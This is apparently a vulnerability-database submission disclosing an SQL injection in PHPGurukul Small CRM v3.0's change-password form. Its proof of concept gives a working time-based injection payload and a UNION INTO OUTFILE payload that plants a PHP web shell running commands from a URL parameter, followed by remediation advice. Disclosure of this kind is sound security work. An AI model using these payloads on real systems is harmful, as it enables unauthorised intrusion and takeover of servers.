| Title | PHPGurukul Small CRM V 3.0 Remote Code Execution (RCE) |
|---|
| Description | Description:
The Change Password page on Small CRM v3.0 is vulnerable to SQL injection which is enabling authorized remote code execution (RCE) on Password change page after login. This vulnerability stems from insufficient input validation in the password change field, compounded by the lack of parameterized queries and authentication.
Step by step POC:
1. login to the application Small CRM v3.0
2. click on change password which is on the left side
3. now give some random input and capture the request
4. Send it repeater and drop the original request
5. change the old password field with the sql payload that is: '+or+sleep(2)#
look at the output after a few seconds as the response got delayed we can conform the SQL injection
6. Now we change the input of the same field which is old password and will give this as input to the request:
'+AND+1337=1337+union+all+select+"<?php+echo+shell_exec($_GET['cmd']);?>"INTO+OUTFILE+'C:\\xampp\\htdocs\\webshell.php'#
Now we can see the response because our query got executed.
7.now Visit this URL associated with the generated file.
Impact:
Unauthorized access to the system leads to information leak and Reputation damage as the system got compromised.
Remediation:
Implement thorough input validation and use parameterized queries.
Follow the least privilege principle for database user permissions.
Deploy a WAF to monitor and block SQL injection attempts.
Keep software updated with security patches.
Provide security training for personnel.
Conduct regular security audits and penetration testing.
Configure servers securely.
Implement continuous monitoring for suspicious activities.
|
|---|
| Source | ⚠️ https://github.com/psudo-bugboy/CVE-2024 |
|---|
| User | 1Psudoman (ID 67374) |
|---|
| Submission | 04/09/2024 15:17 (1 month ago) |
|---|
| Moderation | 04/12/2024 09:03 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 260479 |
|---|